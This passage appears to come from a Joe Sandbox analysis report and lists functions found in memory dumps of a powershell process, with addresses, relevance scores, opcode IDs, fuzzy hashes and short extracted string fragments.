                                  • Instruction Fuzzy Hash: 1681B171A002048FCB14EF68D480AAEBBF6FF85318F14C56EE4199B655DB75EC46CB80
                                  Function 04C889E8 Relevance: .2, Instructions: 204COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 153a92bf26e7f22432a2a0bad7d40b8b9db13a5489497bcd8a3ea877105f61eb
                                  • Instruction ID: 01d49ebdb40185f1434f21edb6193d2ad6e31a7b2d8bc550e0bbeee404367c9c
                                  • Opcode Fuzzy Hash: 153a92bf26e7f22432a2a0bad7d40b8b9db13a5489497bcd8a3ea877105f61eb
                                  • Instruction Fuzzy Hash: 3E81AF34A152449FCB15EF64C8849AEBBF2BF89314F1884ADE405AB361D735ED85DB20
                                  Function 04C89AB6 Relevance: .2, Instructions: 188COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8b959d5ff244e3cbd97666d36894310604b3b75d2c3482eda19640dd7cc2166c
                                  • Instruction ID: 73ebb89880b0004b33cfbab5f6b33a26da5863fe2188af6a58836de3f9b6874c
                                  • Opcode Fuzzy Hash: 8b959d5ff244e3cbd97666d36894310604b3b75d2c3482eda19640dd7cc2166c
                                  • Instruction Fuzzy Hash: 81715B70A002589FDF18EFA9D484AADBBF2BF88308F14852DD416AB354DB35AD46CB41
                                  Function 04C8F95D Relevance: .2, Instructions: 183COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bd7a37ae4f2610c84599f1c3f7b10201779e64b5ec3d05419ef959c11b56cc56
                                  • Instruction ID: f11a7271984b6097da0b3b0f8a5b1bcb175d397873bd4792dafdb8b4f84b81a5
                                  • Opcode Fuzzy Hash: bd7a37ae4f2610c84599f1c3f7b10201779e64b5ec3d05419ef959c11b56cc56
                                  • Instruction Fuzzy Hash: 68715EB0E00249DFDF10DFA9C8957EDBBF2AF88318F14812DE415A7254EB74A946CB91
                                  Function 04C8F968 Relevance: .2, Instructions: 180COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d144e95f2b2313bae3b004079472918f449e3308a87b91beb234292c520a80f3
                                  • Instruction ID: f1e9738d1394013662a66eaf074915f862e73dba0ae0196fd5bd24006b510d75
                                  • Opcode Fuzzy Hash: d144e95f2b2313bae3b004079472918f449e3308a87b91beb234292c520a80f3
                                  • Instruction Fuzzy Hash: 36715D71E00249DFDF10DFA9C8917EEBBF2AF88318F14812DE415A7254EB74A946CB91
                                  Function 07B19FDD Relevance: .1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 82874048401fb06647a396b3146c23190e7b4e61f88e7a7e696340fc4d38e5c2
                                  • Instruction ID: e4e1aefb2976e8ee286c5f66d55852d063f8a27ae1696d415b311eaefbe7c41b
                                  • Opcode Fuzzy Hash: 82874048401fb06647a396b3146c23190e7b4e61f88e7a7e696340fc4d38e5c2
                                  • Instruction Fuzzy Hash: 0D41FEF17002949BDB1097B84415AAAFFC2DFC2324B50C0EED9019F396DD32E856C3A1
                                  Function 04C896D9 Relevance: .1, Instructions: 118COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6df84950855bbafcc1a80975dbf74a08cd93c17605cb3e1ea9923daa69972ba3
                                  • Instruction ID: 9243e01bb26debb84702e4af07d36c07800ce81de38c400775274ff8c3a06d70
                                  • Opcode Fuzzy Hash: 6df84950855bbafcc1a80975dbf74a08cd93c17605cb3e1ea9923daa69972ba3
                                  • Instruction Fuzzy Hash: 49418E71B002448FDB18EB28C998ABDBBB7EF89714F04406CE406EB7A5CB34AD41CB50
                                  Function 04C89933 Relevance: .1, Instructions: 118COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c40cc19861100a94bfc1aa557ef8ff2b82c00535d8a92b3d52ec5dd8313e2c8f
                                  • Instruction ID: 9bc67c09fbde30a7f6ba3c7036fabf85383a13ce2ca64642dd65fac705f0ec1c
                                  • Opcode Fuzzy Hash: c40cc19861100a94bfc1aa557ef8ff2b82c00535d8a92b3d52ec5dd8313e2c8f
                                  • Instruction Fuzzy Hash: C6418E70A00218CFCB18EFA9C4846ADBBF2FF84318F14852DD006AB7A5DB75AC46CB40
                                  Function 07B17C4E Relevance: .1, Instructions: 102COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7610d7f8a1716e398414d6357374ac0e8e4ec1bd75f521c4bfe388d4c3d99673
                                  • Instruction ID: 0103b17a32c8f08753e76ccc2dc4407455e76e45b5746393a83d78de86226a4f
                                  • Opcode Fuzzy Hash: 7610d7f8a1716e398414d6357374ac0e8e4ec1bd75f521c4bfe388d4c3d99673
                                  • Instruction Fuzzy Hash: A731A3F4B90208AFD704AB68C855FAFBAA3EB85344F50C464E9017F395CE769C918B91
                                  Function 07B10EE0 Relevance: .1, Instructions: 94COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 507e4bf73f973c66fb85b741a9826b5e15e1418d4e9cacd92974c62c19943f9d
                                  • Instruction ID: e8ee7a0ba04a1cb5cccdb9d92d8c3560eb02274569ce519503a0fda3640917b4
                                  • Opcode Fuzzy Hash: 507e4bf73f973c66fb85b741a9826b5e15e1418d4e9cacd92974c62c19943f9d
                                  • Instruction Fuzzy Hash: 56218BF130031AABE7246ABE8886B3BB7C6EBC4700F54C47AA505DB385CD75C8C08360
                                  Function 04C8C4E8 Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 33ecf3633a46474652624a71121305b9b91b6dabf2f1d9852abda382ccef2ae9
                                  • Instruction ID: 4094a270e6d1b5bdf1ca149f012421d78d30c353407fc7fc35ff1a36da63b8bb
                                  • Opcode Fuzzy Hash: 33ecf3633a46474652624a71121305b9b91b6dabf2f1d9852abda382ccef2ae9
                                  • Instruction Fuzzy Hash: 1C313030B001288FCB25EB64C8546EEB7B2BF89308F1544E9D40AAB355DF35AE91CF95
                                  Function 07B10EC5 Relevance: .1, Instructions: 85COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 057b4719c00a48e2a5924d1eafb3d5e4a6057f64b2b31faf85b3fb05227e03f9
                                  • Instruction ID: d8f21cdf53a3f087689060674910ad0083dc77ef94d23d18bf18484ac0c8ae14
                                  • Opcode Fuzzy Hash: 057b4719c00a48e2a5924d1eafb3d5e4a6057f64b2b31faf85b3fb05227e03f9
                                  • Instruction Fuzzy Hash: 6B219BF170436A7BE7212B6B88557767B96AF85700F98C4A6E544CF2C6CA35C8C883A1
                                  Function 04C83985 Relevance: .1, Instructions: 78COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e8ff41b06657ac465424e74c1b1bc29da78e37d79104730473c5b8e380e4afd8
                                  • Instruction ID: 6d68ba3ed5bc2fa9adf1e271bd711891cde860c0c311bdf88ccd38a317285e74
                                  • Opcode Fuzzy Hash: e8ff41b06657ac465424e74c1b1bc29da78e37d79104730473c5b8e380e4afd8
                                  • Instruction Fuzzy Hash: E1313E74A04645CFCB04CF98C484AA9FBF2FF49310B1586AAD859EB721C735EC41CBA0
                                  Function 07B10CD0 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1de0b060a9764df59c22a0546954fcd55b07ede9d3334fd269e197fca4c382f5
                                  • Instruction ID: 078aebbc3a8f668c113e285301f88ac8bbe2e3de40f30504c3426c2f872675e7
                                  • Opcode Fuzzy Hash: 1de0b060a9764df59c22a0546954fcd55b07ede9d3334fd269e197fca4c382f5
                                  • Instruction Fuzzy Hash: 7E012BB630021E9BD71469AAE400577FBDADFC1222F54C4BFED49CB641DA32D885C7A0
                                  Function 04C8F60B Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1999a3dc732eca94ba0328434cc7c0ee5a44b29c260471ccb72816fc0c802461
                                  • Instruction ID: 9b7aa820fe96a474533b7ca8f813b5f20d76966d7a228ae1d609afd5739eac7f
                                  • Opcode Fuzzy Hash: 1999a3dc732eca94ba0328434cc7c0ee5a44b29c260471ccb72816fc0c802461
                                  • Instruction Fuzzy Hash: 1F11B630D10149DBEF24EA94D5987ECB7B3AB0932DF14162DC001B61A0EB746A8ACB12
                                  Function 033CD01D Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2682705779.00000000033CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033CD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_33cd000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 357c64526e360ea5261937025c0b7d1ac317051c30e0ba495a8efdfbd9e42e96
                                  • Instruction ID: 4a9d7087fb3df301fc59754004d2729739f01ee04911cd163cad9a246cd63bb2
                                  • Opcode Fuzzy Hash: 357c64526e360ea5261937025c0b7d1ac317051c30e0ba495a8efdfbd9e42e96
                                  • Instruction Fuzzy Hash: ED017C724093909AE7108A29CDC4B67BF9CEB41224F18C56EED484A686C67D9842C7B1
                                  Function 04C82B63 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 08141ff0ca3ae324e6399ac636cbc0c34407fdd0ded03279d2727d36f059ab7d
                                  • Instruction ID: 8df40faa92e1181db8636c460c33b0bf6d1b734222a342009d7b6cc580269477
                                  • Opcode Fuzzy Hash: 08141ff0ca3ae324e6399ac636cbc0c34407fdd0ded03279d2727d36f059ab7d
                                  • Instruction Fuzzy Hash: 5F014478B402159FC704DF98D490AADF771FF8D314B248599D95A9B365CA35EC038B50
                                  Function 033CD01C Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2682705779.00000000033CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033CD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_33cd000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9272e25993fd48dca92b2a142fb3d7b4aa061c442752c91e5b84a2de430bb5f7
                                  • Instruction ID: b49df6254bdaa284c6506d2de8ed827acb37db253413b6839fe787556a8419a7
                                  • Opcode Fuzzy Hash: 9272e25993fd48dca92b2a142fb3d7b4aa061c442752c91e5b84a2de430bb5f7
                                  • Instruction Fuzzy Hash: 68F06272405394AEE7108E1ACDC4B63FFA8EB41634F18C55AED485E286C2799845CBB1
                                  Function 04C83546 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dc0e526415f07da8d60108fc2628fa9178b92f06ee8993fc1251b70b96348c81
                                  • Instruction ID: 7c054a93561c61d2dd4492e3231b3d94b1678cef62500ce945cc3dbaed9d238e
                                  • Opcode Fuzzy Hash: dc0e526415f07da8d60108fc2628fa9178b92f06ee8993fc1251b70b96348c81
                                  • Instruction Fuzzy Hash: 68F0B235A001099FCB15CB9DD990AEEF7B2FF88324F208159E515A72A1C736AD52CB60
                                  Function 07B130AC Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 67d8ef9648bd9e42ac54411d9ddbf51ed1d0bdd203b5b66061e61d8ab81c7586
                                  • Instruction ID: 6a01d8244060fffae4f392568d6b13bd5271ea0746b2ef4451a9088201f25b63
                                  • Opcode Fuzzy Hash: 67d8ef9648bd9e42ac54411d9ddbf51ed1d0bdd203b5b66061e61d8ab81c7586
                                  • Instruction Fuzzy Hash: 2DF0C9B460D285DFE7128B14D959B50BFF1AF82215B59C0DAC0848F1A3D7779846CB51

                                  Non-executed Functions

                                  Function 033CD338 Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2682705779.00000000033CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033CD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_33cd000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 58fb0b6134b1536782d52eaebf3336e404068d6efcc052a37f318afc7b9e6522
                                  • Instruction ID: 588a7f5fd6c1ba3dcbef415371e6b9e4f5b751e560c65921d37c26906c80c583
                                  • Opcode Fuzzy Hash: 58fb0b6134b1536782d52eaebf3336e404068d6efcc052a37f318afc7b9e6522
                                  • Instruction Fuzzy Hash: A8212371614280DFD700EF18DAC0B2ABBA8EB84714F24C6BEE8494B645C339D806C761
                                  Function 07B1CA00 Relevance: 20.4, Strings: 16, Instructions: 371COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$4'^q$4'^q$84#l$84#l$d%dq$d%dq$d%dq$d%dq$tP^q$tP^q$$^q$$^q$$^q$$^q
                                  • API String ID: 0-3004703813
                                  • Opcode ID: c7b93da50532e56bd083b32f8c0bd60095e48d15be8e472803b31224e96c179f
                                  • Instruction ID: cfb0eb213593da1fcd7e248fede8d0c8e7805efa91563b0889aaf305b859c6a1
                                  • Opcode Fuzzy Hash: c7b93da50532e56bd083b32f8c0bd60095e48d15be8e472803b31224e96c179f
                                  • Instruction Fuzzy Hash: AFC138F1B8020ADFEB258F29C40466ABFE2EF85610F6484EAE805DB255DB31DC45C7B1
                                  Function 07B1D29D Relevance: 19.0, Strings: 15, Instructions: 293COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$84#l$84#l$84#l$84#l$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
                                  • API String ID: 0-1743338168
                                  • Opcode ID: 13e60d6b20d59c3013c30e19f75d14a2ede01f7c60287e15b2ec03a484ca0cb5
                                  • Instruction ID: cc6e99da6652a4f222f54dc74dd7d93c80cc86104a27c41f0b5777c1d2be384a
                                  • Opcode Fuzzy Hash: 13e60d6b20d59c3013c30e19f75d14a2ede01f7c60287e15b2ec03a484ca0cb5
                                  • Instruction Fuzzy Hash: 97A109F1B002199FEB148F68D44466ABBE2FF89314FA484E9E8059F395DB31DD41CBA1
                                  Function 07B181E0 Relevance: 17.9, Strings: 14, Instructions: 402COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                  • API String ID: 0-604858858
                                  • Opcode ID: f045158dbf6c141a69c4c967b163c159c5eda9ea027dcb8fbf402293c5a57936
                                  • Instruction ID: 988fa5577993e5ca96ee7ecd2fa82e183ad447fc61e1a76f2563f0d584af8ab1
                                  • Opcode Fuzzy Hash: f045158dbf6c141a69c4c967b163c159c5eda9ea027dcb8fbf402293c5a57936
                                  • Instruction Fuzzy Hash: C7D16BF1B0421A9FEB254B69941066ABBE2FF85330F9484FAE845CF255DF32C845C7A1
                                  Function 07B123E8 Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                  • API String ID: 0-3512890053
                                  • Opcode ID: 0a6dff96fab3d21f33cf0d420db14ebc119ca00c695eb62d486000c4666b2437
                                  • Instruction ID: 6195cb7203bf0dbf9bf345c01cd48bc449bf33d8f691fab6745b1916d507f573
                                  • Opcode Fuzzy Hash: 0a6dff96fab3d21f33cf0d420db14ebc119ca00c695eb62d486000c4666b2437
                                  • Instruction Fuzzy Hash: 99A138F170420A8FEB254B2998606BBBBE5FF81210F9484FAD945CF295DE35CC85C7A1
                                  Function 07B1DD1D Relevance: 10.2, Strings: 8, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 84#l$84#l$XRcq$XRcq$XRcq$tP^q$tP^q$$^q
                                  • API String ID: 0-4251566974
                                  • Opcode ID: 6efc2e59fcfaff16ddd201507fcf860ff8dad61c1b34c970dd11857bb9644de8
                                  • Instruction ID: e4dbbb93ee7a87aad709228efb19535781887b770bd91ef89df73e8a0ce0d704
                                  • Opcode Fuzzy Hash: 6efc2e59fcfaff16ddd201507fcf860ff8dad61c1b34c970dd11857bb9644de8
                                  • Instruction Fuzzy Hash: 056137B1B00109DFDB189F6984006AAFBE2EFC9711F64C4A9E8059F355DB31DD41CBA1
                                  Function 07B1C9F8 Relevance: 8.9, Strings: 7, Instructions: 152COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$84#l$d%dq$d%dq$d%dq$tP^q$$^q
                                  • API String ID: 0-2106454715
                                  • Opcode ID: 0f1fe9b7270d337c8768aa1cf209928ac62dc6b4951a84f0a1af8566b4bfc451
                                  • Instruction ID: 27911598ff3106071c0af3b5c8aa899ecdb9c9f360169e26b8ff3e5166e9cff6
                                  • Opcode Fuzzy Hash: 0f1fe9b7270d337c8768aa1cf209928ac62dc6b4951a84f0a1af8566b4bfc451
                                  • Instruction Fuzzy Hash: 2851C1F0A5020ADBEB24CF15C544A6ABFE2FB45750FA884E9E805DB294D731DD80CBB1
                                  Function 07B11D78 Relevance: 7.6, Strings: 6, Instructions: 146COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$t~qq$$^q$$^q$$^q
                                  • API String ID: 0-2923853403
                                  • Opcode ID: 925d301e0b2b7f87fe70a1e5fac4708b94a54b0fcda79f58ec2c4ddff4374879
                                  • Instruction ID: ee018a4df67b18a5546149c3ced6b4f9e5b4c74dd35e2acb0ce773f40974bfcb
                                  • Opcode Fuzzy Hash: 925d301e0b2b7f87fe70a1e5fac4708b94a54b0fcda79f58ec2c4ddff4374879
                                  • Instruction Fuzzy Hash: 27417FF2B0024E9BEB295ABD8400276BBD2EFC5210FA4C5FED6418F295DE36C855C352
                                  Function 07B1CB26 Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$84#l$d%dq$d%dq$d%dq$tP^q
                                  • API String ID: 0-2176637398
                                  • Opcode ID: 794ff43e3f856e5d14315dab771b57a169a2a26a9f63ae62164b18be53ffdd20
                                  • Instruction ID: 7168c1de8f256b992cef20981b331cf6f231439de80e69080184b830303f4506
                                  • Opcode Fuzzy Hash: 794ff43e3f856e5d14315dab771b57a169a2a26a9f63ae62164b18be53ffdd20
                                  • Instruction Fuzzy Hash: EC31B1F0A80219EFDB18DF59C444A6ABFE2FB88B50F649599E905AB350C731DC41CBA1
                                  Function 07B1D6AD Relevance: 6.4, Strings: 5, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 84#l$84#l$tP^q$tP^q$$^q
                                  • API String ID: 0-1915195031
                                  • Opcode ID: 8c477541f4316438668b343093f9531786add6b2b8c52225f0455be147aa4009
                                  • Instruction ID: f259cd1e86d5294e5621cf3db43feb6c1e3426317b9aafadf0e001edbd1e0719
                                  • Opcode Fuzzy Hash: 8c477541f4316438668b343093f9531786add6b2b8c52225f0455be147aa4009
                                  • Instruction Fuzzy Hash: 0A6137B5B00209DFEB149F699404A6AFBE2EF85710FA4C4E9E8059F391DB31DD41CBA1
                                  Function 07B181DE Relevance: 6.4, Strings: 5, Instructions: 110COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                  • API String ID: 0-3997570045
                                  • Opcode ID: 2faec226990154581c64123decc427b812e2e50a332968a9e0aa5f373bceb3fd
                                  • Instruction ID: 626be64ca2004aaad0787cf94ca81d0ef3316d5ac67f5932915e06e95a7f64b1
                                  • Opcode Fuzzy Hash: 2faec226990154581c64123decc427b812e2e50a332968a9e0aa5f373bceb3fd
                                  • Instruction Fuzzy Hash: 8E41C2F0A04606EBFB298E05D444BA9B7A1FB45730F9881E6E8155F294CB31D840CBD2
                                  Function 07B141B5 Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                  • API String ID: 0-3272787073
                                  • Opcode ID: 3881d461be7e972bd782178c405f124bb7f78a464436ce32513e3315c5b2e25a
                                  • Instruction ID: 5f73b77da5f8f40f309a03fc0cb621f84171d4cbb7b5a90e4f9f8f05acc75705
                                  • Opcode Fuzzy Hash: 3881d461be7e972bd782178c405f124bb7f78a464436ce32513e3315c5b2e25a
                                  • Instruction Fuzzy Hash: B8315CF2B14286CFFB290B649414576FBA1EBD2311BA485FAC8058F214DE31C496C791
                                  Function 07B1C290 Relevance: 5.5, Strings: 4, Instructions: 499COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (o^q$(o^q$(o^q$(o^q
